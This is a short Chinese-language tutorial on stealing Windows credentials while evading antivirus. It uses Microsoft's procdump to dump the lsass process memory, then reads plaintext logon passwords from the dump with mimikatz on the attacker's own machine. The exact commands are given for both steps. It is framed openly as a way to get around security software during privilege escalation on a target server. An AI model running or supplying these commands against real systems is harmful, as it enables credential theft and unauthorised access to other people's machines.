目录
0x01 介绍
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。
0x02 procdump介绍
Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。
具体可以查看:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
0x03操作
使用procdump转储lsass进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit